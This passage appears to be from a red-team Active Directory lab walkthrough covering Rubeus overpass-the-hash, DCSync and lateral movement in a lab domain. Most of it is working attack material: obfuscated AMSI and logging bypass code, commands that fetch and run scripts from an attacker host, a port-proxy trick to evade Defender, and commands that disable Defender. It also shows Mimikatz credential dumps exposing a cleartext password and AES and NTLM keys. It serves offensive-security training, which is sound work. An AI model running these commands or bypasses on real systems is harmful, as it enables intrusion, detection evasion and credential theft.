Both commands initiate the cmd.exe process with a logon type 9, which is similar to using runas /netonly.
Under logon type 9, accessing local resources reveals the original username, while accessing network
resources utilizes the new credentials.

Using Rubeus
Rubeus is a powerful post-exploitation tool designed to interact with Kerberos tickets. It can perform
various tasks related to Kerberos authentication, including ticket requests, renewals, extraction, and
manipulation. Rubeus is often used in red team operations to leverage Kerberos functionalities and
extract credentials without directly accessing the LSASS process.

Key Features of Rubeus

1. Kerberos Ticket Extraction: Extracts tickets from memory.

2. Pass-the-Ticket (PTT): Injects Kerberos tickets into the current session.

3. Ticket Renewal and Overpass-the-Hash (Pass-the-Key): Renews tickets or uses NTLM hashes to
request TGTs.

4. Ticket Request: Requests TGTs and TGS tickets.

5. Ticket Management: Lists, purges, or renews tickets.

 6. Silver Ticket and Golden Ticket Forgery: Creates forged service tickets or TGTs.

7. S4U (Service for User): Performs S4U2Self and S4U2Proxy operations.

8. AS-REP Roasting: Extracts and cracks AS-REP hashes.

We can use the following command for Overpass the Hash attack. The following command does not
require administrative privileges.
Rubeus.exe asktgt /user:<username> /rc4:<ntml hash> /ptt

The following command requires elevation.

Rubeus.exe asktgt /user:<username> /aes256:<aes key> /opsec /createnetonly:<Process to start>
/show /ptt

DCSync attack
DCSync is a technique used to extract credentials from the Domain Controllers. In this attack, we mimic a
Domain Controller and leverage the (MS-DRSR) protocol and request for replication using GetNCChanges
function. In response to this the Domain Controller will return the replication data that includes password
hashes. This technique was added in Mimikatz tool in August 2015 by Benjamin Delpy and Vincent Le
Toux.

Domain Administrator privileges are required to execute this attack.

Using Invoke-Mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Using SafetKatz
BetterSafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

In the lab we use Invoke-Mimi.ps1, the Obfuscated version of Invoke-Mimikatz.ps1. This tool is available
in C:\Ad\Tools folder.

NetLoader
NetLoader.exe is a post-exploitation tool often used by penetration testers and red teamers to execute
payloads on remote systems. It is a lightweight loader designed to download and execute shellcode or
other malicious payloads directly from memory, which helps to avoid writing any malicious code to disk,
thereby reducing the likelihood of detection by antivirus software.

Key Features of NetLoader.exe

• Memory-Only Execution: Downloads and executes payloads directly in memory to avoid disk
operations and reduce detection.

• Network-Based Loading: Retrieves payloads from a specified URL, enabling flexible and remote
delivery of malicious code.
 • Stealth: Designed to operate stealthily, bypassing many security mechanisms and detection tools.

• Flexible Payloads: Can be used to load various types of payloads, including shellcode and other
executable code.

Running Loader.exe to deliver payloads

C:\Ad\Tools\Loader.exe -Path http://172.16.100.163/Safetykatz.exe

Lateral Movement – 1
Dumping Credentials
We have previously obtained a reverse shell from the machine DCORP-CI as dcorp\ciadmin by abusing
Jenkins. Now we will use the reverse shell to laterally move across the network.

We will first run Script logging and AMSI Bypass on the reverse shell. Instead of running the Invishell, we
will run the scripts to bypass Script logging and AMSI separately. We will host the sbloggingbypass.txt and
amisbypass.txt in the HFS webserver.

Content of sbloggingbypass.txt
[Reflection.Assembly]::"l`o`AdwIThPa`Rti`AlnamE"(('S'+'ystem'+'.C'+'ore'))."g`E`TTYPE"(('Sys'+'te
m.Di'+'agno'+'stics.Event'+'i'+'ng.EventProv'+'i'+'der'))."gET`FI`eLd"(('m'+'_'+'enabled'),('NonP
'+'ubl'+'ic'+',Instance'))."seTVa`l`Ue"([Ref]."a`sSem`BlY"."gE`T`TyPE"(('Sys'+'tem'+'.Mana'+'ge'+
'ment.Aut'+'o'+'mation.Tracing.'+'PSEtwLo'+'g'+'Pro'+'vi'+'der'))."gEtFIe`Ld"(('e'+'tw'+'Provid'+
'er'),('N'+'o'+'nPu'+'b'+'lic,Static'))."gE`Tva`lUe"($null),0)

Content of amsibypass.txt
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' )
) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"((
"{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') )
)."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

PS C:\Users\Administrator\.jenkins\workspace\Project9> iex (iwr -UseBasicParsing

http://172.16.100.163/sbloggingbypass.txt)
PS C:\Users\Administrator\.jenkins\workspace\Project9> iex (iwr -UseBasicParsing
http://172.16.100.163/amsibypass.txt)

Now we will host PowerView.ps1 in HFS and run it on DCORP-CI.

PS C:\Users\Administrator\.jenkins\workspace\Project9> iex((New-Object
Net.WebClient).DownloadString('http://172.16.100.163/PowerView.ps1'))

Now from this server, we will run the function Find-DomainUserlocation to find any Domain Admins
sessions on any machine where the current user ciadmin is an administrator.
PS C:\Users\Administrator\.jenkins\workspace\Project9> Find-DomainUserLocation -CheckAccess

UserDomain : dcorp
UserName : svcadmin
ComputerName : dcorp-mgmt.dollarcorp.moneycorp.local
IPAddress : 172.16.4.44
SessionFrom :
SessionFromName :
LocalAdmin :

PS C:\Users\Administrator\.jenkins\workspace\Project9> Method invocation failed because

[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
At line:7155 char:19
+ try { $Results.dispose() }
+ ~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : MethodNotFound

From the output, we find that there is a domain admin (svcadmin) session on the machine dcorp-mgmt.
We can dump the credentials on that machine and obtain the privileges of the domain admin user
svcadmin.

Method – 1
We will use SafetyKatz.exe to dump all the credentials from the machine DCORP-MGMT. For this we will
download loader.exe to DCORP-CI. And then from there we transfer the loader.exe to DCORP-MGMT. We
host the SafetyKatz.exe on the WebServer from our student machine using HFS and then execute
Safetykatz.exe in memory on the machine DCORP-MGMT to dump the credentials on DCORP-MGMT.

Step-1: Downloading Loader.exe to DCORP-CI.

Copy the loader.exe from the machine DCORP-STD163 to DCORP-CI. For this we will host the loader.exe
in HFS and download it to DCORP-CI. From there we will copy it to DCORP-MGMT. We are copying the
Loader.exe to C:\Users\Public but not to temp. This is because copying executables to temp creates a lot
of noise since EDRs heavily monitor it.
PS C:\Users\Administrator\.jenkins\workspace\Project9>iwr http://172.16.100.163/Loader.exe -
OutFile C:\Users\Public\Loader.exe
PS C:\Users\Administrator\.jenkins\workspace\Project9> cd C:\Users\Public
PS C:\Users\Public> dir

Directory: C:\Users\Public

Mode LastWriteTime Length Name

---- ------------- ------ ----
d-r--- 11/11/2022 12:53 AM Documents
d-r--- 5/8/2021 1:15 AM Downloads
d-r--- 5/8/2021 1:15 AM Music
d-r--- 5/8/2021 1:15 AM Pictures
d-r--- 5/8/2021 1:15 AM Videos
-a---- 6/21/2024 9:29 PM 201216 Loader.exe

Step-2: Transferring Loader.exe to DCORP-MGMT.

We will now transfer the Loader.exe to DCORP-MGMT.

PS C:\Users\Public> echo F | xcopy C:\Users\Public\Loader.exe \\dcorp-
mgmt\C$\Users\Public\loader.exe
Does \\dcorp-mgmt\C$\Users\Public\loader.exe specify a file name
or directory name on the target
(F = file, D = directory)? F
C:\Users\Public\Loader.exe
1 File(s) copied

Step-3: Dumping Credentials

Now we can host SafetyKatz.exe in HFS on our student machine and then execute it on DCORP-MGMT in
memory. But Defender detects it easily since we are downloading it from an unknown Web Server. To
prevent Detection, we redirect a port on the machine DCORP-MGMT to port 80 on our student machine
and then execute it in memory.
PS C:\Users\Public> $null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4
listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.163"

If we send any request to port 8080 on DCORP-MGMT, then it is redirected to port 80 of our student
machine.

We will now dump credentials.

PS C:\users\Public> $null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path
http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit
[*] Applying amsi patch: true
[*] Applying etw patch: true
[*] Decrypting packed exe...
[!] ~Flangvik - Arno0x0x Edition - #NetLoader
[+] Patched!
[+] Starting http://127.0.0.1:8080/SafetyKatz.exe with args ''

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -path
ERROR mimikatz_doLocal ; "-path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # http://127.0.0.1:8080/SafetyKatz.exe
ERROR mimikatz_doLocal ; "http://127.0.0.1:8080/SafetyKatz.exe" command of "standard" module not
found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # sekurlsa::ekeys

Authentication Id : 0 ; 56541 (00000000:0000dcdd)

Session : Service from 0
User Name : svcadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:15:55 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1118

* Username : svcadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : *ThisisBlasphemyThisisMadness!!
* Key List :
aes256_hmac 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
aes128_hmac 8c0a8695795df6c9a85c4fb588ad6cbd
rc4_hmac_nt b38ff50264b74508085d82c69794a4d8
rc4_hmac_old b38ff50264b74508085d82c69794a4d8
rc4_md4 b38ff50264b74508085d82c69794a4d8
rc4_hmac_nt_exp b38ff50264b74508085d82c69794a4d8
rc4_hmac_old_exp b38ff50264b74508085d82c69794a4d8

Authentication Id : 0 ; 54690 (00000000:0000d5a2)

Session : Service from 0
User Name : SQLTELEMETRY
Domain : NT Service
Logon Server : (null)
Logon Time : 2/21/2024 3:15:54 AM
SID : S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
aes256_hmac c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
aes128_hmac b3b9f96ed137fb4c079dcfe2e23f7854
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 996 (00000000:000003e4)

Session : Service from 0
User Name : DCORP-MGMT$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-20

* Username : dcorp-mgmt$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 20862 (00000000:0000517e)

Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-96-0-0

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
aes256_hmac c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
aes128_hmac b3b9f96ed137fb4c079dcfe2e23f7854
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 1027589 (00000000:000fae05)

Session : Interactive from 0
User Name : mgmtadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:57:38 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1120

* Username : mgmtadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 902129307ec94942b00c6b9d866c67a2376f596bc9bdcf5f85ea83176f97c3aa
rc4_hmac_nt 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_old 95e2cd7ff77379e34c6e46265e75d754
rc4_md4 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_nt_exp 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_old_exp 95e2cd7ff77379e34c6e46265e75d754

Authentication Id : 0 ; 359605 (00000000:00057cb5)

Session : RemoteInteractive from 2
User Name : mgmtadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:25:49 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1120

* Username : mgmtadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 902129307ec94942b00c6b9d866c67a2376f596bc9bdcf5f85ea83176f97c3aa
rc4_hmac_nt 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_old 95e2cd7ff77379e34c6e46265e75d754
rc4_md4 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_nt_exp 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_old_exp 95e2cd7ff77379e34c6e46265e75d754

Authentication Id : 0 ; 288282 (00000000:0004661a)

Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:20:28 AM
SID : S-1-5-96-0-2

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
aes256_hmac c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
aes128_hmac b3b9f96ed137fb4c079dcfe2e23f7854
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 20803 (00000000:00005143)

Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-96-0-1

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
aes256_hmac c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
aes128_hmac b3b9f96ed137fb4c079dcfe2e23f7854
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 999 (00000000:000003e7)

Session : UndefinedLogonType from 0
User Name : DCORP-MGMT$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/21/2024 3:15:48 AM
SID : S-1-5-18

* Username : dcorp-mgmt$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
 rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

mimikatz(commandline) # exit
Bye!

Note: When we dump credentials with Mimikatz, we would get multiple AES keys for Machine account.
The correct AES keys for the machine account could be found from the SID S-1-5-18.

Method – 2
We will use Invoke-Mimikatz.ps1 to dump all the credentials from the machine DCORP-MGMT. For this
we will download Invoke-Mimikatz.ps1 and execute it on DCORP-CI. We will create an interactive session
with the machine DCORP-MGMT and disable defender on DCORP-MGMT. Then we will execute the
function Invoke-Mimikatz on the machine DCORP-MGMT to dump the credentials.

Step-1: Download Invoke-Mimikatz.ps1 and execute it on DCORP-CI.

PS C:\Users\Public> iex((New-Object Net.WebClient).DownloadString('http://172.16.100.163/Invoke-
Mimikatz.ps1'))

Step-2: Create an Interactive Session on DCORP-MGMT and disable Defender.

PS C:\Users\Public> $Session = New-PSSession -Computername dcorp-mgmt.dollarcorp.moneycorp.local
PS C:\Users\Public> Invoke-Command -Session $Session -ScriptBlock {Set-MpPreference -
DisableRealtimeMonitoring $true}
PS C:\Users\Public> Invoke-Command -Session $Session -ScriptBlock { Set-MpPreference -
DisableBehaviorMonitoring $true }
PS C:\Users\Public> Invoke-Command -Session $Session -ScriptBlock { Set-MpPreference -
DisableIntrusionPreventionSystem $true }
PS C:\Users\Public> Invoke-Command -Session $Session -ScriptBlock { Set-MpPreference -
DisableIOAVProtection $true }

Step-3: Executing the function Invoke-Mimikatz to dump credentials

Since we have executed the PowerShell script Invoke-Mimikatz.ps1 on the machine DCORP-CI, the
function Invoke-Mimiktz.ps1 is available in the memory of DCORP-CI. We will execute the same function
on the machine DCORP-MGMT using the interactive session we have previously opened.
PS C:\Users\Public> Invoke-Command -Session $Session -ScriptBlock ${Function:Invoke-Mimikatz}

.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::ekeys

Authentication Id : 0 ; 56541 (00000000:0000dcdd)

Session : Service from 0
User Name : svcadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:15:55 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1118

* Username : svcadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : *ThisisBlasphemyThisisMadness!!
* Key List :
des_cbc_md4 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
des_cbc_md4 8c0a8695795df6c9a85c4fb588ad6cbd
des_cbc_md4 b38ff50264b74508085d82c69794a4d8
des_cbc_md4 b38ff50264b74508085d82c69794a4d8
des_cbc_md4 b38ff50264b74508085d82c69794a4d8
des_cbc_md4 b38ff50264b74508085d82c69794a4d8
des_cbc_md4 b38ff50264b74508085d82c69794a4d8

Authentication Id : 0 ; 54690 (00000000:0000d5a2)

Session : Service from 0
User Name : SQLTELEMETRY
Domain : NT Service
Logon Server : (null)
Logon Time : 2/21/2024 3:15:54 AM
SID : S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
des_cbc_md4 c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
des_cbc_md4 b3b9f96ed137fb4c079dcfe2e23f7854
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 996 (00000000:000003e4)

Session : Service from 0
User Name : DCORP-MGMT$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-20

* Username : dcorp-mgmt$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
des_cbc_md4 b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 20862 (00000000:0000517e)

Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-96-0-0

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
des_cbc_md4 c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
des_cbc_md4 b3b9f96ed137fb4c079dcfe2e23f7854
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 1027589 (00000000:000fae05)

Session : Interactive from 0
User Name : mgmtadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:57:38 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1120

* Username : mgmtadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
des_cbc_md4 902129307ec94942b00c6b9d866c67a2376f596bc9bdcf5f85ea83176f97c3aa
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754

Authentication Id : 0 ; 359605 (00000000:00057cb5)

Session : RemoteInteractive from 2
User Name : mgmtadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:25:49 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1120

* Username : mgmtadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
des_cbc_md4 902129307ec94942b00c6b9d866c67a2376f596bc9bdcf5f85ea83176f97c3aa
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754
des_cbc_md4 95e2cd7ff77379e34c6e46265e75d754

Authentication Id : 0 ; 288282 (00000000:0004661a)

Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:20:28 AM
SID : S-1-5-96-0-2

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
des_cbc_md4 c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
des_cbc_md4 b3b9f96ed137fb4c079dcfe2e23f7854
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 20803 (00000000:00005143)

Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-96-0-1

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
des_cbc_md4 c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
des_cbc_md4 b3b9f96ed137fb4c079dcfe2e23f7854
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 999 (00000000:000003e7)

Session : UndefinedLogonType from 0
User Name : DCORP-MGMT$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/21/2024 3:15:48 AM
SID : S-1-5-18

* Username : dcorp-mgmt$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
des_cbc_md4 b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
des_cbc_md4 0878da540f45b31b974f73312c18e754
mimikatz(powershell) # exit
Bye!

We have obtained the following hashes.

Username AES Hashes

svcadmin 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
mgmtadmin 902129307ec94942b00c6b9d866c67a2376f596bc9bdcf5f85ea83176f97c3aa
DCORP-MGMT$ c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076

Username NTLM Hashes

svcadmin b38ff50264b74508085d82c69794a4d8
mgmtadmin 95e2cd7ff77379e34c6e46265e75d754
DCORP-MGMT$ 0878da540f45b31b974f73312c18e754

